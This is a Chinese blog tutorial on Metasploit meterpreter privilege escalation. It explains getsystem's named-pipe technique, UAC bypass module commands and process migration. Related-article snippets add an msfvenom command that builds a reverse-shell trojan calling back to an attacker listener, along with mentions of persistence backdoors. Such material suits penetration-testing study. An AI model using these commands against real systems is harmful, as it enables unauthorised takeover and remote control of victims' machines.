12.1、后渗透测试--提权

最新推荐文章于 2024-06-02 12:13:27 发布
最新推荐文章于 2024-06-02 12:13:27 发布
阅读量739 收藏 3
点赞数 1
分类专栏: 安全 文章标签: metasploit 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leiwuhen92/article/details/128303486
版权

meterpreter提权方式:

  1. getsystem自动提权
  2. bypassuac提权
  3. migrate

1、getsystem自动提权

meterpreter > getsystem
getsystem工作原理:
  1. getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。
  2. getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。
  3. Windows服务已启动,导致与命名管道建立连接。
  4. 该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。

2、bypassuac提权

use exploit/windows/local/bypassuac
set session 1
run
返回了一个新的meterpreter,再次输入getsystem,成功绕过uac,得到系统权限:

3、migrate

我们回到session 1尝试进行reboot操作但是无果
输入ps查看当前的进程:
找到:
输入指令migrate 1252来提升权限:
当前权限程度可以进行重启:
但无法进行新建账号。

参考:

青霄
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
meterpreter提权小结
MercyLin的博客
09-05 3006
经过一波操作我们成功进入meterperter,接下来主要就如何在meterpreter进行提权 首先我们可以输入getuid来查看当前用户的权限~ 可以看到我们貌似可能是管理员权限,到底是不是还有待验证,我们的最终目的是将其提升到system权限. getsystem自动提权 输入getsystem来尝试提权,MSF会自动选择合适的方式来提升当前权限 这个就比较玄学,我还没成功过,可以看到g...
Metapreter实现持续访问,自动化,提权--详细教程
qq_41245301的博客
01-05 636
1.先拿到目标主机的控制权限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同。EXE_NAME 生成后门文件的文件名称(非必要,用默认)REG_NAME 注册表设置的名称 (非必要,用默认)VBS_NAME VBS脚本的名称 (非必要,用默认)PATH 后门文件的存放路径 (非必要,用默认)SESSION 作用于那个会话。这里会自动执行文件中的命令。
渗透测试框架提权
2301_80361487的博客
06-02 726
getsystem是由Metasploit-Framework提供的一个模块,它可以将一个管理帐户(通常为本地Administrator账户)提升为本地SYSTEM帐户。UAC:用户帐户控制(User Account Control),是windows操作系统中采用的一种控制机制,它以预见的。1)getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。2)getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。优点:省去手动查找的麻烦。
Meterpreter提权详解
devil8123665的博客
12-06 1651
转载https://www.cnblogs.com/backlion/p/9484950.html 0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/me
Meterpreter 提权
eli的博客
05-20 2216
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
利用meterperter进行win7系统提权
weixin_63137680的博客
10-30 1747
利用meterpreter对win7系统进行提权
hbase-0.98.12.1-hadoop1-bin.tar.gz
12-04
本文将围绕"Hbase-0.98.12.1-hadoop1-bin.tar.gz"这一特定版本的HBase进行详细介绍,包括其特性、安装与配置、以及与Hadoop1的集成。 1. **HBase 0.98.12.1概述** HBase 0.98.12.1是HBase的早期稳定版本,提供了...
cm-12.1-20161124-UNOFFICIAL-mondrianwifi_20170822075123.zip
12-11
标题 "cm-12.1-20161124-UNOFFICIAL-mondrianwifi_20170822075123.zip" 暗示了这是一个定制的Android ROM(操作系统)更新包,具体来说是CyanogenMod的一个版本,CyanogenMod是一个基于Android开源项目(AOSP)的第...
ANSI ESD STM12.1-2019座椅-电阻测量【自译版本】
06-09
本标准测试方法1旨在提供用于评估 ESD 控制程序中使用的座椅的测试方法。该标准测试方法涵盖所有类型的座椅,包括椅子和凳子。 该标准测试方法仅限于定义测量电阻的程序。电阻是一种可用于评估用于 ESD 控制区域的...
DELPHI 12.1 key RADStudio-12-1-29-0-51961-7529-KeyPatch
最新发布
06-08
RADStudio-12-1-29-0-51961-7529-KeyPatch
cmd反弹shell提权
10-24
cmd反弹shell提权
oracle-instantclient12.1-basic-12.1.0.2.0-1.x86_64.rpm
04-13
这个特定的版本,“oracle-instantclient12.1-basic-12.1.0.2.0-1.x86_64.rpm”,是针对64位Linux系统的,版本号为12.1.0.2.0,它包含了一些基本的组件,以支持客户端应用程序连接到Oracle数据库服务器。 Oracle ...
meterpreter使用
weixin_30405421的博客
09-26 1497
0x01 系统命令 基本系统命令 1 background # 将当前会话放置后台 2 sessions # sessions –h 查看帮助 3 sessions -i <ID值> #进入会话 -k 杀死会话 4 bgrun / run # 执行已有的模块,输入run后按两下tab,列出已有的脚本 5 info # 查看已有...
2、(权限提升)进入Meterpreter后的攻击方式小结
daxi0ng的博客
03-15 1573
##使用getsystem提权失败的话,可以使用WMIC工具进行提权准备,使用提权模块进行提权,如MS16-032,本次进入的就是system权限。 令牌窃取 令牌简介及原理 令牌 (Token) 就是系统的临时密钥, 相当于账户名和密码, 用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。 它允许你在不提供密码或其他凭证的前提下, 访问网络和系统资源。 这些令牌将持续存在于系统中, 除...
提权学习之旅——利用Metasploit提权
Lemon's blog
08-16 694
1
Metasploit提权和后渗透
Kali与编程
12-04 1540
后渗透技术包括提权、横向移动、持久化、数据窃取、漏洞利用等,攻击者可以利用这些技术和工具深入系统内部,并获取系统中的敏感信息、提高攻击者的权限、绕过防御措施等。在本文中,我将详细介绍Metasploit提权模块和技术,包括Windows和Linux系统下的提权模块和技术,以及如何使用Metasploit进行提权攻击。横向移动是指攻击者在入侵一个系统后,通过利用系统内部的漏洞或者获取其他用户的登录名和密码等方式,从一个系统进入另一个系统,进而攻击其他系统。
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 952
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
cuda12.1对应的tensorflow-gpu
05-01
您好,根据TensorFlow官方文档,TensorFlow 2.4及更高版本支持CUDA 11。如果您要使用CUDA 12.1,您需要使用TensorFlow的开发版本,并将其从源代码编译安装。 以下是使用CUDA 12.1的TensorFlow构建指南: 1. 安装CUDA 12.1和cuDNN 8.0。请确保您的CUDA和cuDNN版本兼容。您可以从NVIDIA官方网站下载这些软件。 2. 安装Bazel构建工具。具体安装方法请参考Bazel官方文档。 3. 从GitHub上克隆TensorFlow代码库: ``` git clone https://github.com/tensorflow/tensorflow.git ``` 4. 切换到TensorFlow代码库的目录,并执行以下命令: ``` ./configure ``` 这将提示您选择TensorFlow的一些配置选项。请根据您的需要进行选择。例如,您可以选择是否启用GPU支持,是否启用JIT编译等。 5. 执行以下命令编译TensorFlow: ``` bazel build --config=monolithic --config=cuda //tensorflow/tools/pip_package:build_pip_package ``` 这将编译一个TensorFlow的pip包。请注意,编译时间可能会很长,取决于您的硬件性能和网络速度。 6. 执行以下命令打包TensorFlow: ``` bazel-bin/tensorflow/tools/pip_package/build_pip_package /tmp/tensorflow_pkg ``` 这将在/tmp/tensorflow_pkg目录下生成一个TensorFlow的pip包。 7. 安装TensorFlow: ``` pip install /tmp/tensorflow_pkg/tensorflow-version-tags.whl ``` 将“version-tags”替换为TensorFlow版本号即可。 希望这可以帮助您构建TensorFlow与CUDA 12.1的兼容版本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值